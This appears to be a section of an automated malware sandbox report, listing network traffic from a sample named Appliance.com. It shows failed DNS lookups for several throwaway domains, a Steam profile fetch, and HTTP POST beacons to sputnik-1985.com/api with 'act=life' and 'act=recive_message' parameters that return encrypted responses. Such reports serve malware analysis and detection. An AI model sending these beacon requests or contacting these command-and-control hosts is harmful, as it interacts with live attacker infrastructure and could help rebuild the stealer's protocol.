                                                                                                                                          Jan 10, 2025 12:06:32.770433903 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:32.770634890 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:32.782382011 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:32.782382011 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:32.782407045 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:32.782419920 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 10, 2025 12:06:00.260647058 CET4920053192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:00.269191027 CET53492001.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.870440006 CET5100253192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.879566908 CET53510021.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.882584095 CET6488953192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.891345024 CET53648891.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.894226074 CET6052053192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.903135061 CET53605201.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.905518055 CET6133053192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.914936066 CET53613301.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.917167902 CET5468053192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.932107925 CET53546801.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.934811115 CET6445353192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.947910070 CET53644531.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.950790882 CET5091953192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.959995031 CET53509191.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.962805986 CET5376253192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.973184109 CET53537621.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.975795984 CET5376553192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.989090919 CET53537651.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:21.991847992 CET6431653192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:21.998331070 CET53643161.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.274111032 CET6258053192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET53625801.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Jan 10, 2025 12:06:00.260647058 CET192.168.2.41.1.1.10xfbc0Standard query (0)aGpUaEJqSGxZhd.aGpUaEJqSGxZhdA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.870440006 CET192.168.2.41.1.1.10x8cbaStandard query (0)ingreem-eilish.bizA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.882584095 CET192.168.2.41.1.1.10x279bStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.894226074 CET192.168.2.41.1.1.10x58edStandard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.905518055 CET192.168.2.41.1.1.10xe293Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.917167902 CET192.168.2.41.1.1.10x2318Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.934811115 CET192.168.2.41.1.1.10x53fcStandard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.950790882 CET192.168.2.41.1.1.10x9eddStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.962805986 CET192.168.2.41.1.1.10xe191Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.975795984 CET192.168.2.41.1.1.10xc69cStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.991847992 CET192.168.2.41.1.1.10xb83eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.274111032 CET192.168.2.41.1.1.10x9994Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 10, 2025 12:06:00.269191027 CET1.1.1.1192.168.2.40xfbc0Name error (3)aGpUaEJqSGxZhd.aGpUaEJqSGxZhdnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.879566908 CET1.1.1.1192.168.2.40x8cbaName error (3)ingreem-eilish.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.891345024 CET1.1.1.1192.168.2.40x279bName error (3)immureprech.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.903135061 CET1.1.1.1192.168.2.40x58edName error (3)deafeninggeh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.914936066 CET1.1.1.1192.168.2.40xe293Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.932107925 CET1.1.1.1192.168.2.40x2318Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.947910070 CET1.1.1.1192.168.2.40x53fcName error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.959995031 CET1.1.1.1192.168.2.40x9eddName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.973184109 CET1.1.1.1192.168.2.40xe191Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.989090919 CET1.1.1.1192.168.2.40xc69cName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:21.998331070 CET1.1.1.1192.168.2.40xb83eNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET1.1.1.1192.168.2.40x9994No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET1.1.1.1192.168.2.40x9994No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET1.1.1.1192.168.2.40x9994No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET1.1.1.1192.168.2.40x9994No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET1.1.1.1192.168.2.40x9994No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET1.1.1.1192.168.2.40x9994No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 12:06:23.283212900 CET1.1.1.1192.168.2.40x9994No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                          • steamcommunity.com
                                                                                                                                          • sputnik-1985.com
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449737104.102.49.2544434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:22 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Host: steamcommunity.com
                                                                                                                                          2025-01-10 11:06:23 UTC1905INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:23 GMT
                                                                                                                                          Content-Length: 35126
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: sessionid=73f5122b9b5bdf8cf1a4d449; Path=/; Secure; SameSite=None
                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                          2025-01-10 11:06:23 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                          2025-01-10 11:06:23 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                          Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                          2025-01-10 11:06:23 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                          Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                          2025-01-10 11:06:23 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                          Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449738104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:23 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                          Data Ascii: act=life
                                                                                                                                          2025-01-10 11:06:24 UTC1123INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:24 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=53ua0h4em18mccaaf3so5siult; expires=Tue, 06 May 2025 04:53:03 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2iMAD%2ByTEj%2B8fcxaO9RzGH4ffApZgvwLytxrWfb2cJSD87dGUXbLQ8BHK7qCH8njJkEmQ0RmYJOhrNs8R4xPHRrazZ%2BH2DZkKDk8jadoBK%2FxbKUls9xEGWFKR1M7cRKTRz9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc328b1816de95-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1580&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1761158&cwnd=242&unsent_bytes=0&cid=3237b659a4b37b4d&ts=475&x=0"
                                                                                                                                          2025-01-10 11:06:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                          Data Ascii: 2ok
                                                                                                                                          2025-01-10 11:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449739104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:24 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 86
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:24 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                          2025-01-10 11:06:25 UTC1121INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:25 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=jijhpse1ctf3lhrir8o7le4t7i; expires=Tue, 06 May 2025 04:53:04 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hS3CVgZ0umXHXIL3Rb9UT3%2B0shYffY9qUKr6SAEQb%2FfeNHTulbJjXLCtMTGMwrD6aoPdps54usPtjwWra%2BOwtBL48q1kW7dG06oIdEXmVnIN9FDOnBoq6A0FQFOC52q0Ou0N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc32910c6ac358-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1652&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1645070&cwnd=155&unsent_bytes=0&cid=deaf32a0d1855a41&ts=476&x=0"
                                                                                                                                          2025-01-10 11:06:25 UTC248INData Raw: 34 36 62 0d 0a 61 34 58 36 69 38 32 79 38 6f 77 32 6b 43 30 6e 49 42 45 33 79 56 45 46 73 53 4d 4e 4d 61 71 41 2b 61 45 7a 74 67 48 37 71 34 6f 51 70 34 79 70 39 34 62 65 72 6b 58 31 44 78 31 47 63 46 75 36 4e 43 6d 54 51 6d 6b 54 6b 4f 61 59 7a 55 44 54 4c 64 6e 64 35 30 6d 2f 6e 4f 71 68 77 5a 65 67 46 50 56 56 42 52 70 4b 54 4f 73 30 61 35 4d 5a 4c 31 54 41 34 70 6a 4e 55 64 64 71 6c 4e 76 6d 43 4f 32 57 37 4b 58 58 6b 65 68 58 2f 45 42 43 52 58 52 57 6f 7a 39 73 33 45 74 67 45 34 61 69 6e 4e 73 52 6a 43 4f 32 7a 76 34 4b 79 4a 76 34 70 70 43 50 6f 45 32 79 53 45 6b 43 4b 78 57 6f 4e 47 66 64 52 57 6c 61 77 75 69 52 78 56 44 53 61 34 76 43 37 41 50 74 6d 4f 2b 6b 33 5a 6a 38 57 76 5a 48 53 55 4e 2b 56 75 74 39 4a 39 52 5a 4c 77 75
                                                                                                                                          Data Ascii: 46ba4X6i82y8ow2kC0nIBE3yVEFsSMNMaqA+aEztgH7q4oQp4yp94berkX1Dx1GcFu6NCmTQmkTkOaYzUDTLdnd50m/nOqhwZegFPVVBRpKTOs0a5MZL1TA4pjNUddqlNvmCO2W7KXXkehX/EBCRXRWoz9s3EtgE4ainNsRjCO2zv4KyJv4ppCPoE2ySEkCKxWoNGfdRWlawuiRxVDSa4vC7APtmO+k3Zj8WvZHSUN+Vut9J9RZLwu
                                                                                                                                          2025-01-10 11:06:25 UTC890INData Raw: 49 73 61 6e 41 51 4d 56 32 6c 4e 6e 75 53 66 6a 57 38 4f 2f 58 6e 4b 34 4d 73 6b 64 4a 54 48 5a 57 70 44 52 6d 30 31 4e 67 55 38 76 71 6b 38 64 62 32 32 79 57 78 2b 49 4f 37 35 48 75 6f 4e 65 59 36 46 76 78 44 77 73 43 64 45 33 72 61 79 66 7a 55 57 78 51 33 4f 2b 4b 67 30 36 61 65 74 6e 4f 35 45 6d 2f 32 4f 2b 68 30 5a 33 75 52 76 70 45 54 6b 64 68 58 71 49 2b 61 74 4e 4d 5a 56 7a 4c 34 70 7a 4a 57 39 74 70 6e 63 54 6c 44 2b 65 59 71 65 47 51 6c 2f 59 55 71 67 39 6d 52 32 4e 53 70 79 55 6c 36 51 46 77 48 64 47 69 6e 4d 38 52 6a 43 4f 52 7a 4f 73 4b 37 4a 66 71 70 39 75 43 37 6b 62 30 51 6b 42 51 64 56 43 6c 4f 57 54 42 53 32 46 56 79 2b 75 51 79 6c 54 54 5a 39 6d 48 71 41 37 2f 32 4c 48 76 38 5a 33 6c 57 50 68 59 52 51 4a 73 47 37 4a 7a 59 4e 38 42 4e 78
                                                                                                                                          Data Ascii: IsanAQMV2lNnuSfjW8O/XnK4MskdJTHZWpDRm01NgU8vqk8db22yWx+IO75HuoNeY6FvxDwsCdE3rayfzUWxQ3O+Kg06aetnO5Em/2O+h0Z3uRvpETkdhXqI+atNMZVzL4pzJW9tpncTlD+eYqeGQl/YUqg9mR2NSpyUl6QFwHdGinM8RjCORzOsK7Jfqp9uC7kb0QkBQdVClOWTBS2FVy+uQylTTZ9mHqA7/2LHv8Z3lWPhYRQJsG7JzYN8BNx
                                                                                                                                          2025-01-10 11:06:25 UTC1369INData Raw: 33 65 61 31 0d 0a 77 61 64 31 47 65 52 50 58 72 49 4b 44 56 74 67 6a 77 59 6e 6d 42 4f 79 55 37 71 62 52 6b 2b 35 65 2f 45 42 50 53 6e 74 56 70 6a 4a 73 32 30 64 69 57 4d 66 74 6e 4d 74 53 32 47 61 55 79 71 68 48 70 35 2f 78 37 34 6a 51 79 31 72 78 58 6c 51 41 52 6c 61 6c 50 57 44 46 41 58 41 64 30 61 4b 63 7a 78 47 4d 49 35 50 4f 37 77 33 71 6b 75 71 72 31 4a 33 68 58 66 74 47 56 30 68 2f 57 37 6b 2b 62 64 5a 50 59 31 62 48 34 70 72 43 58 39 35 6f 32 59 65 6f 44 76 2f 59 73 65 2f 2f 6e 66 35 47 2b 45 52 55 41 45 5a 57 70 54 31 67 78 51 46 77 48 64 47 69 6e 4d 38 52 6a 43 4f 53 7a 2b 51 46 35 35 37 37 6f 64 2b 43 35 45 62 32 51 55 46 4f 66 56 79 6d 50 47 4c 42 52 57 39 42 79 65 65 63 7a 56 7a 47 5a 74 6d 48 71 41 37 2f 32 4c 48 76 36 71 54 70 52 4f 4e 49
                                                                                                                                          Data Ascii: 3ea1wad1GeRPXrIKDVtgjwYnmBOyU7qbRk+5e/EBPSntVpjJs20diWMftnMtS2GaUyqhHp5/x74jQy1rxXlQARlalPWDFAXAd0aKczxGMI5PO7w3qkuqr1J3hXftGV0h/W7k+bdZPY1bH4prCX95o2YeoDv/Yse//nf5G+ERUAEZWpT1gxQFwHdGinM8RjCOSz+QF5577od+C5Eb2QUFOfVymPGLBRW9ByeeczVzGZtmHqA7/2LHv6qTpRONI
                                                                                                                                          2025-01-10 11:06:25 UTC1369INData Raw: 57 6f 49 6d 43 54 44 79 39 64 7a 75 4c 62 6d 30 66 45 64 4a 37 57 70 68 43 6e 6e 2b 58 76 69 4e 44 6b 52 76 64 42 51 55 68 32 55 61 63 35 5a 39 5a 54 5a 31 58 50 37 70 50 47 58 74 4a 6d 6c 4d 37 6a 43 76 57 4b 36 71 76 65 6e 4b 34 61 73 6b 68 64 41 69 73 56 6a 69 52 6b 77 30 64 73 45 39 65 73 67 6f 4e 57 32 43 50 42 69 65 67 48 36 35 50 75 70 4e 75 55 36 6c 54 2f 52 45 74 4d 65 6c 6d 6a 50 32 44 42 54 47 70 62 77 75 75 65 7a 31 7a 58 63 5a 72 49 71 45 65 6e 6e 2f 48 76 69 4e 44 4a 5a 38 56 73 42 56 30 39 54 4f 73 30 61 35 4d 5a 4c 31 4c 41 35 5a 58 48 51 39 70 78 6c 38 37 6f 44 2b 2b 51 37 71 50 65 6e 76 78 63 38 30 39 4c 54 58 74 63 72 7a 4a 6a 31 30 31 6f 45 34 61 69 6e 4e 73 52 6a 43 4f 78 79 76 49 54 70 62 62 69 72 39 65 41 2b 45 2b 79 55 41 74 62 4d
                                                                                                                                          Data Ascii: WoImCTDy9dzuLbm0fEdJ7WphCnn+XviNDkRvdBQUh2Uac5Z9ZTZ1XP7pPGXtJmlM7jCvWK6qvenK4askhdAisVjiRkw0dsE9esgoNW2CPBiegH65PupNuU6lT/REtMelmjP2DBTGpbwuuez1zXcZrIqEenn/HviNDJZ8VsBV09TOs0a5MZL1LA5ZXHQ9pxl87oD++Q7qPenvxc809LTXtcrzJj101oE4ainNsRjCOxyvITpbbir9eA+E+yUAtbM
